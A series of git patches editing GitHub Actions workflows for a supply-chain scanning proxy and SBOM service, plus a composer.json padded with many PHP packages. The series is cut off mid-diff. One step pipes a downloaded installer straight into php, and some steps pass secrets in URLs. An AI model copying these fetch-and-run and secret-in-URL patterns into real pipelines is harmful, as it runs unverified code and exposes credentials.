fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -70,49 +23,49 @@ jobs: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine - options: --cap-add=NET_ADMIN + options: --cap-add=NET_ADMIN --dns=8.8.8.8 strategy: matrix: node-version: [18.x] steps: + # Step 1: Print Scan ID (for debug purposes) - name: Print Scan ID env: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} run: echo $SCAN_ID + # Step 2: Use PSE Action (Make sure to provide the correct GitHub token) - name: PSE Action uses: invisirisk/pse-action@v1.0.8 with: github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + # Step 3: Checkout the repository code - name: Checkout code uses: actions/checkout@v3 with: fetch-depth: 0 token: ${{ secrets.GITHUB_TOKEN }} - - name: Configure Git - run: | - git config --global --add safe.directory "${GITHUB_WORKSPACE}" - git config --global user.name "GitHub Actions" - git config --global user.email "github-actions[bot]@users.noreply.github.com" - + # Step 4: Setup Node.js - name: Setup Node.js uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} + # Step 5: Install dependencies - name: Install dependencies run: | npm install npm ci + # Step 6: Build and test the application - name: Build and test run: | npm run build --if-present npm test + # Step 7: Commit and push changes (if there are any) - name: Commit and push changes run: | if [[ -n "$(git status --porcelain)" ]]; then From 552b1d97a6534a4a54c8ac102edcb5b7d2e0d947 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:19:43 +0545 Subject: [PATCH 32/89] Update main.yml --- .github/workflows/main.yml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index e112e03..aa43b4b 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,9 +1,12 @@ name: Build and Test with Proxy on: - push: - branches: - - main + workflow_dispatch: + inputs: + example_input: + description: 'An example input' + required: false + default: 'default_value' jobs: start_proxy_and_build: From 829a11c37bdeadb0fd5ecd4d4ca06b98388dbf99 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:21:10 +0545 Subject: [PATCH 33/89] Update main.yml --- .github/workflows/main.yml | 48 +++++++++++++++++++++++++++++++++++--- 1 file changed, 45 insertions(+), 3 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index aa43b4b..7e284f1 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -9,9 +9,51 @@ on: default: 'default_value' jobs: + setup_scan: + runs-on: ubuntu-latest + steps: + - name: Initiating SBOM Scan + id: createScan + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{env.API_URL}}/utilityapi/v1/scan' + method: 'POST' + data: '{"api_key": "${{secrets.VB_API_KEY}}"}' + + - name: Parse Response + id: parseResponse + run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + + ecr_details: + runs-on: ubuntu-latest + outputs: + ecr_username: ${{steps.ecr_details.outputs.username}} + ecr_token: ${{steps.ecr_details.outputs.token}} + ecr_region: ${{steps.ecr_details.outputs.region}} + ecr_id: ${{steps.ecr_details.outputs.registry_id}} + steps: + - name: Fetching VB Token + id: fetchECRDetails + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' + + - name: Decoding VB Token + id: parseToken + run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" + + - name: ECR Details + id: ecr_details + run: | + echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" + echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" + echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + start_proxy_and_build: runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] + needs: [setup_scan, ecr_details] # This job depends on the above two jobs services: pse: image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:latest @@ -34,7 +76,7 @@ jobs: # Step 1: Print Scan ID (for debug purposes) - name: Print Scan ID env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + SCAN_ID: ${{ needs.setup_scan.outputs.scan_id }} run: echo $SCAN_ID # Step 2: Use PSE Action (Make sure to provide the correct GitHub token) @@ -77,4 +119,4 @@ jobs: git push https://${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git HEAD:${{ github.ref }} else echo "No changes to commit" - fi + From e19d41b555bcc4275b0ed8ad22330fe4722a9549 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:27:51 +0545 Subject: [PATCH 34/89] Update main.yml --- .github/workflows/main.yml | 110 +++++++++++++------------------------ 1 file changed, 39 insertions(+), 71 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 7e284f1..3732e6c 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,16 +1,19 @@ -name: Build and Test with Proxy - +name: Build NPM Package on: - workflow_dispatch: - inputs: - example_input: - description: 'An example input' - required: false - default: 'default_value' + workflow_dispatch: + +permissions: + checks: write + contents: read + packages: read +env: + API_URL: https://app.veribom.com jobs: - setup_scan: + create_scan_in_IR_Portal: runs-on: ubuntu-latest + outputs: + scan_id: ${{ steps.parseResponse.outputs.scan_id }} steps: - name: Initiating SBOM Scan id: createScan @@ -18,12 +21,10 @@ jobs: with: url: '${{env.API_URL}}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - + data: '{"api_key": "${{secrets.VB_API_KEY_PROD}}"}' - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: runs-on: ubuntu-latest outputs: @@ -36,13 +37,11 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' - + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_PROD}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details id: ecr_details run: | @@ -50,73 +49,42 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + start_proxy_and_build: runs-on: ubuntu-latest - needs: [setup_scan, ecr_details] # This job depends on the above two jobs + needs: [create_scan_in_IR_Portal, ecr_details] services: pse: image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:latest credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_PROD}} + INVISIRISK_PORTAL: https://app.veribom.com + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine - options: --cap-add=NET_ADMIN --dns=8.8.8.8 + options: --cap-add=NET_ADMIN strategy: matrix: node-version: [18.x] steps: - # Step 1: Print Scan ID (for debug purposes) - - name: Print Scan ID - env: - SCAN_ID: ${{ needs.setup_scan.outputs.scan_id }} - run: echo $SCAN_ID - - # Step 2: Use PSE Action (Make sure to provide the correct GitHub token) - - name: PSE Action - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} - - # Step 3: Checkout the repository code - - name: Checkout code - uses: actions/checkout@v3 - with: - fetch-depth: 0 - token: ${{ secrets.GITHUB_TOKEN }} - - # Step 4: Setup Node.js - - name: Setup Node.js - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - # Step 5: Install dependencies - - name: Install dependencies - run: | - npm install - npm ci - - # Step 6: Build and test the application - - name: Build and test - run: | - npm run build --if-present - npm test - - # Step 7: Commit and push changes (if there are any) - - name: Commit and push changes - run: | - if [[ -n "$(git status --porcelain)" ]]; then - git add . - git commit -m "chore: automated build and test updates [skip ci]" - git push https://${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git HEAD:${{ github.ref }} - else - echo "No changes to commit" - + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + + - run: npm install -g pnpm + - run: pnpm install From 3912ff6cc1b86d99882729b9e806724b9f863c85 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:29:20 +0545 Subject: [PATCH 35/89] Update main.yml --- .github/workflows/main.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 3732e6c..aa72ff3 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -7,7 +7,7 @@ permissions: contents: read packages: read env: - API_URL: https://app.veribom.com + API_URL: https://app.stage.veribom.com jobs: create_scan_in_IR_Portal: @@ -62,8 +62,8 @@ jobs: env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_PROD}} - INVISIRISK_PORTAL: https://app.veribom.com + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.veribom.com GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From b77fb250b9e2152fb97e104e35f51508ec6559f4 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:31:53 +0545 Subject: [PATCH 36/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index aa72ff3..c19fda8 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -21,7 +21,7 @@ jobs: with: url: '${{env.API_URL}}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY_PROD}}"}' + data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" @@ -37,7 +37,7 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_PROD}}' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' method: 'GET' - name: Decoding VB Token id: parseToken From bc181a7a659d3ecf95ffe5d0ce52631aab702ed3 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:32:17 +0545 Subject: [PATCH 37/89] Update main.yml --- .github/workflows/main.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index c19fda8..0635c62 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -55,7 +55,7 @@ jobs: needs: [create_scan_in_IR_Portal, ecr_details] services: pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:latest + image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} From cba14b6c9eccc5394fc207f679e7a3cee786f20e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:03:36 +0545 Subject: [PATCH 38/89] Create composer.json --- composer.json | 111 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 111 insertions(+) create mode 100644 composer.json diff --git a/composer.json b/composer.json new file mode 100644 index 0000000..7868e26 --- /dev/null +++ b/composer.json @@ -0,0 +1,111 @@ +{ + "require": { + "monolog/monolog": "^2.0", + "guzzlehttp/guzzle": "^7.0", + "symfony/symfony": "^6.0", + "laravel/framework": "^10.0", + "phpunit/phpunit": "^9.0", + "doctrine/orm": "^2.0", + "fzaninotto/faker": "^1.9", + "vlucas/phpdotenv": "^5.0", + "swiftmailer/swiftmailer": "^6.0", + "twig/twig": "^3.0", + "psr/log": "^1.0", + "sebastian/version": "^3.0", + "sebastian/global-state": "^5.0", + "sebastian/exporter": "^4.0", + "sebastian/environment": "^5.0", + "sebastian/diff": "^4.0", + "sebastian/comparator": "^4.0", + "phpdocumentor/reflection-common": "^2.0", + "phpdocumentor/type-resolver": "^1.0", + "phpdocumentor/reflection-docblock": "^5.0", + "webmozart/assert": "^1.0", + "phpoption/phpoption": "^1.0", + "nikic/php-parser": "^4.0", + "mockery/mockery": "^1.0", + "hamcrest/hamcrest-php": "^2.0", + "dnoegel/php-xdg-base-dir": "^0.1", + "composer/semver": "^3.0", + "composer/installers": "^2.0", + "composer/ca-bundle": "^2.0", + "composer/composer": "^2.0", + "classpreloader/classpreloader": "^4.0", + "brianium/paratest": "^6.0", + "brick/math": "^0.9", + "aws/aws-sdk-php": "^3.0", + "asm89/stack-cors": "^2.0", + "ramsey/uuid": "^4.0", + "ralouphie/getallheaders": "^3.0", + "psy/psysh": "^0.10", + "phpseclib/phpseclib": "^3.0", + "phpspec/prophecy": "^1.0", + "phar-io/version": "^3.0", + "phar-io/manifest": "^2.0", + "paragonie/random_compat": "^9.0", + "myclabs/deep-copy": "^1.0", + "league/mime-type-detection": "^1.0", + "league/flysystem": "^3.0", + "league/commonmark": "^2.0", + "lcobucci/jwt": "^4.0", + "laravel/tinker": "^2.0", + "symfony/http-foundation": "^6.0", + "symfony/console": "^6.0", + "symfony/routing": "^6.0", + "symfony/event-dispatcher": "^6.0", + "symfony/http-kernel": "^6.0", + "symfony/finder": "^6.0", + "symfony/filesystem": "^6.0", + "symfony/process": "^6.0", + "symfony/var-dumper": "^6.0", + "symfony/translation": "^6.0", + "symfony/validator": "^6.0", + "symfony/serializer": "^6.0", + "symfony/yaml": "^6.0", + "symfony/security-core": "^6.0", + "symfony/security-http": "^6.0", + "symfony/security-csrf": "^6.0", + "symfony/security-guard": "^6.0", + "symfony/security-bundle": "^6.0", + "symfony/monolog-bridge": "^6.0", + "symfony/twig-bridge": "^6.0", + "symfony/twig-bundle": "^6.0", + "symfony/asset": "^6.0", + "symfony/expression-language": "^6.0", + "symfony/cache": "^6.0", + "symfony/lock": "^6.0", + "symfony/messenger": "^6.0", + "symfony/mailer": "^6.0", + "symfony/mercure": "^6.0", + "symfony/web-link": "^6.0", + "symfony/dom-crawler": "^6.0", + "symfony/browser-kit": "^6.0", + "symfony/css-selector": "^6.0", + "symfony/phpunit-bridge": "^6.0", + "symfony/panther": "^2.0", + "symfony/string": "^6.0", + "symfony/uid": "^6.0", + "symfony/rate-limiter": "^6.0", + "symfony/scheduler": "^6.0", + "symfony/remote-event": "^6.0", + "symfony/webhook": "^6.0", + "symfony/notifier": "^6.0", + "symfony/password-hasher": "^6.0", + "symfony/clock": "^6.0", + "symfony/doctrine-bridge": "^6.0", + "symfony/doctrine-messenger": "^6.0", + "symfony/orm-pack": "^2.0", + "symfony/webpack-encore-bundle": "^1.0", + "symfony/ux": "^2.0", + "symfony/ux-turbo": "^2.0", + "symfony/ux-twig-component": "^2.0", + "symfony/ux-live-component": "^2.0", + "symfony/ux-dropzone": "^2.0", + "symfony/ux-chartjs": "^2.0", + "symfony/ux-cropperjs": "^2.0", + "symfony/ux-lazy-image": "^2.0", + "symfony/ux-notify": "^2.0", + "symfony/ux-toggle-password": "^2.0", + "symfony/ux-autocomplete": "^2.0" + } +} From a75fe0d8c6ce8b590cfa9e56e9f2521b2a8090e4 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:04:02 +0545 Subject: [PATCH 39/89] Create mainphp.yml --- .github/workflows/mainphp.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 .github/workflows/mainphp.yml diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/.github/workflows/mainphp.yml @@ -0,0 +1 @@ + From 200227dbcf37f4d81e0c61f479b07e9cb990b344 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:05:28 +0545 Subject: [PATCH 40/89] Update main.yml --- .github/workflows/main.yml | 75 ++++++++++++++++++++------------------ 1 file changed, 39 insertions(+), 36 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 0635c62..31e135a 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,6 +1,6 @@ -name: Build NPM Package +name: Build PHP Package on: - workflow_dispatch: + workflow_dispatch: permissions: checks: write @@ -19,37 +19,38 @@ jobs: id: createScan uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/scan' + url: '${{ env.API_URL }}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' + data: '{"api_key": "${{ secrets.VB_API_KEY }}"}' - name: Parse Response id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + run: echo "scan_id=${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}" >> "$GITHUB_OUTPUT" + ecr_details: runs-on: ubuntu-latest outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} + ecr_username: ${{ steps.ecr_details.outputs.username }} + ecr_token: ${{ steps.ecr_details.outputs.token }} + ecr_region: ${{ steps.ecr_details.outputs.region }} + ecr_id: ${{ steps.ecr_details.outputs.registry_id }} steps: - name: Fetching VB Token id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY }}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - name: ECR Details id: ecr_details run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + echo "username=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}" >> "$GITHUB_OUTPUT" + echo "token=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}" >> "$GITHUB_OUTPUT" + echo "region=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}" >> "$GITHUB_OUTPUT" + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -57,34 +58,36 @@ jobs: pse: image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test credentials: - username: ${{needs.ecr_details.outputs.ecr_username}} - password: ${{needs.ecr_details.outputs.ecr_token}} + username: ${{ needs.ecr_details.outputs.ecr_username }} + password: ${{ needs.ecr_details.outputs.ecr_token }} env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.veribom.com + INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY }} + INVISIRISK_PORTAL: https://app.stage.veribom.com GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: - image: node:18-alpine + image: php:8.2 options: --cap-add=NET_ADMIN strategy: matrix: - node-version: [18.x] + php-version: [8.2] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - - run: npm install -g pnpm - - run: pnpm install + + - name: Checkout the code + uses: actions/checkout@v3 + + - name: Install Composer + run: | + curl -sS https://getcomposer.org/installer | php + sudo mv composer.phar /usr/local/bin/composer + + - name: Install PHP Dependencies + run: composer install From 694ba5d015c2180660a62e5314e9fe995afdaf01 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:06:49 +0545 Subject: [PATCH 41/89] Update mainphp.yml --- .github/workflows/mainphp.yml | 92 +++++++++++++++++++++++++++++++++++ 1 file changed, 92 insertions(+) diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml index 8b13789..31e135a 100644 --- a/.github/workflows/mainphp.yml +++ b/.github/workflows/mainphp.yml @@ -1 +1,93 @@ +name: Build PHP Package +on: + workflow_dispatch: +permissions: + checks: write + contents: read + packages: read +env: + API_URL: https://app.stage.veribom.com + +jobs: + create_scan_in_IR_Portal: + runs-on: ubuntu-latest + outputs: + scan_id: ${{ steps.parseResponse.outputs.scan_id }} + steps: + - name: Initiating SBOM Scan + id: createScan + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{ env.API_URL }}/utilityapi/v1/scan' + method: 'POST' + data: '{"api_key": "${{ secrets.VB_API_KEY }}"}' + - name: Parse Response + id: parseResponse + run: echo "scan_id=${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}" >> "$GITHUB_OUTPUT" + + ecr_details: + runs-on: ubuntu-latest + outputs: + ecr_username: ${{ steps.ecr_details.outputs.username }} + ecr_token: ${{ steps.ecr_details.outputs.token }} + ecr_region: ${{ steps.ecr_details.outputs.region }} + ecr_id: ${{ steps.ecr_details.outputs.registry_id }} + steps: + - name: Fetching VB Token + id: fetchECRDetails + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY }}' + method: 'GET' + - name: Decoding VB Token + id: parseToken + run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" + - name: ECR Details + id: ecr_details + run: | + echo "username=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}" >> "$GITHUB_OUTPUT" + echo "token=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}" >> "$GITHUB_OUTPUT" + echo "region=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}" >> "$GITHUB_OUTPUT" + + start_proxy_and_build: + runs-on: ubuntu-latest + needs: [create_scan_in_IR_Portal, ecr_details] + services: + pse: + image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test + credentials: + username: ${{ needs.ecr_details.outputs.ecr_username }} + password: ${{ needs.ecr_details.outputs.ecr_token }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY }} + INVISIRISK_PORTAL: https://app.stage.veribom.com + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + container: + image: php:8.2 + options: --cap-add=NET_ADMIN + strategy: + matrix: + php-version: [8.2] + steps: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + + - name: Checkout the code + uses: actions/checkout@v3 + + - name: Install Composer + run: | + curl -sS https://getcomposer.org/installer | php + sudo mv composer.phar /usr/local/bin/composer + + - name: Install PHP Dependencies + run: composer install From a386a7ad00dc79585e32bbb865a342963fb6ea7f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:08:06 +0545 Subject: [PATCH 42/89] Update main.yml --- .github/workflows/main.yml | 75 ++++++++++++++++++-------------------- 1 file changed, 36 insertions(+), 39 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 31e135a..0635c62 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,6 +1,6 @@ -name: Build PHP Package +name: Build NPM Package on: - workflow_dispatch: + workflow_dispatch: permissions: checks: write @@ -19,38 +19,37 @@ jobs: id: createScan uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{ env.API_URL }}/utilityapi/v1/scan' + url: '${{env.API_URL}}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{ secrets.VB_API_KEY }}"}' + data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - name: Parse Response id: parseResponse - run: echo "scan_id=${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}" >> "$GITHUB_OUTPUT" - + run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" ecr_details: runs-on: ubuntu-latest outputs: - ecr_username: ${{ steps.ecr_details.outputs.username }} - ecr_token: ${{ steps.ecr_details.outputs.token }} - ecr_region: ${{ steps.ecr_details.outputs.region }} - ecr_id: ${{ steps.ecr_details.outputs.registry_id }} + ecr_username: ${{steps.ecr_details.outputs.username}} + ecr_token: ${{steps.ecr_details.outputs.token}} + ecr_region: ${{steps.ecr_details.outputs.region}} + ecr_id: ${{steps.ecr_details.outputs.registry_id}} steps: - name: Fetching VB Token id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY }}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - name: ECR Details id: ecr_details run: | - echo "username=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}" >> "$GITHUB_OUTPUT" - echo "token=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}" >> "$GITHUB_OUTPUT" - echo "region=${{ 